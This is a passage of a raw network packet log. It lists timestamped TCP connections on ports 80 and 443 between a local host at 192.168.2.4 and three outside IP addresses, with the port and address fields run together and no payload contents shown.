                                                                                                                                          Dec 8, 2024 18:06:13.245934963 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.245978117 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.246031046 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.246844053 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.246897936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.246975899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.247926950 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.247976065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.248068094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.248109102 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.248786926 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.248888016 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.248895884 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.248929977 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.249618053 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.249671936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.249701977 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.250480890 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.250534058 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.250633001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.251357079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.251406908 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.251481056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.251909018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.252257109 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.252401114 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.252449989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.253156900 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.253267050 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.253314018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.254076958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.254224062 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.254277945 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.255045891 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.255089045 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.255135059 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.255968094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.256104946 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.256149054 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.256889105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.256939888 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.256948948 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.257715940 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.257762909 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.257831097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.258655071 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.258702993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.258737087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.259531975 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.259582996 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:13.259582996 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:13.260235071 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:15.523252010 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:15.526931047 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:15.574915886 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:15.574950933 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:15.575016022 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:15.646884918 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:15.646905899 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:15.649888992 CET8049759185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:15.649941921 CET4975980192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:15.885046959 CET8049781185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:15.885109901 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:15.885423899 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:16.004784107 CET8049781185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:16.984358072 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:16.984431028 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:16.985850096 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:16.985858917 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:16.986084938 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.030599117 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.039335012 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.039361954 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.039577007 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.241739988 CET8049781185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.241805077 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:17.744430065 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.744529963 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.744580030 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.745958090 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.745976925 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.745992899 CET49782443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.746000051 CET44349782172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.806442022 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.806478024 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:17.806536913 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.806941032 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:17.806952953 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:18.860927105 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:18.861243010 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:18.987425089 CET8049781185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:18.987440109 CET8049790185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:18.987484932 CET4978180192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:18.987515926 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:18.987688065 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:19.034959078 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.035021067 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.036026001 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.036036968 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.036278963 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.037309885 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.037352085 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.037364006 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.107008934 CET8049790185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936470985 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936516047 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936548948 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936564922 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.936589003 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936625004 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936657906 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936669111 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.936676025 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.936698914 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.945023060 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.946985006 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.946993113 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.953809023 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.954952955 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.954958916 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:19.999466896 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:19.999473095 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.046233892 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.128444910 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.131995916 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.132074118 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.132168055 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.132184982 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.132200003 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.132230043 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.132267952 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.132565022 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.132582903 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.132592916 CET49788443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.132597923 CET44349788172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.264575005 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.264610052 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.264693975 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.265041113 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:20.265054941 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.334264994 CET8049790185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:20.334342957 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:21.479598999 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.479655027 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.480792046 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.480799913 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.481028080 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.482129097 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.482259035 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.482264042 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.482286930 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.482307911 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.482325077 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.482420921 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:21.523338079 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.843651056 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:21.843936920 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:21.964903116 CET8049800185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.965002060 CET8049790185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:21.965046883 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:21.965068102 CET4979080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:21.965224028 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:22.091335058 CET8049800185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:22.562344074 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:22.562444925 CET44349795172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:22.562505007 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:22.562601089 CET49795443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:22.652540922 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:22.652575970 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:22.652648926 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:22.652976036 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:22.652988911 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:23.344522953 CET8049800185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:23.344592094 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:23.869688034 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:23.869780064 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:23.870804071 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:23.870814085 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:23.871012926 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:23.871978998 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:23.872078896 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:23.872106075 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:24.968736887 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:24.969065905 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:25.000484943 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.000582933 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.000643015 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:25.000734091 CET49802443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:25.000751972 CET44349802172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.088566065 CET8049800185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.088581085 CET8049808185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.088614941 CET4980080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:25.088660955 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:25.088809967 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:25.204612017 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:25.204638004 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.204704046 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:25.204953909 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:25.204967976 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:25.208090067 CET8049808185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.419079065 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.419152975 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:26.420360088 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:26.420370102 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.420618057 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.421854019 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:26.421998024 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:26.422034979 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.422108889 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:26.422118902 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.430351019 CET8049808185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:26.430423021 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:27.305578947 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:27.305655003 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:27.305715084 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:27.305767059 CET49810443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:27.305783033 CET44349810172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:27.896675110 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:27.896708965 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:27.896765947 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:27.897113085 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:27.897128105 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:27.937446117 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:27.937690973 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:28.057604074 CET8049820185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:28.057789087 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:28.058001995 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:28.058072090 CET8049808185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:28.058125973 CET4980880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:28.177689075 CET8049820185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.112500906 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.112581968 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.113665104 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.113672972 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.113898993 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.115040064 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.115143061 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.115149021 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.395327091 CET8049820185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.395375967 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:29.860939980 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.861053944 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:29.861114025 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.861232042 CET49819443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:29.861243010 CET44349819172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:30.254106998 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:30.254122972 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:30.254187107 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:30.254458904 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:30.254471064 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.017265081 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:31.017566919 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:31.138370037 CET8049828185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.139070034 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:31.139673948 CET8049820185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.139733076 CET4982080192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:31.142561913 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:31.267230034 CET8049828185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.476399899 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.476506948 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.498070002 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.498085022 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.498321056 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.509500980 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.522255898 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.522294044 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.522578955 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.522617102 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.523410082 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.523454905 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524099112 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524127960 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524286985 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524327040 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524483919 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524504900 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524517059 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524528980 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524663925 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524693012 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.524715900 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524840117 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.524873018 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.571332932 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.574604988 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.574630976 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.574654102 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.574675083 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:31.574711084 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:31.574743032 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:32.491252899 CET8049828185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:32.494955063 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:33.764213085 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:33.764311075 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:33.764369965 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:33.764463902 CET49826443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:33.764472961 CET44349826172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:33.792710066 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:33.792737961 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:33.792831898 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:33.793086052 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:33.793100119 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:34.000150919 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:34.000458956 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:34.120165110 CET8049828185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:34.120229959 CET4982880192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:34.169864893 CET8049836185.215.113.43192.168.2.4
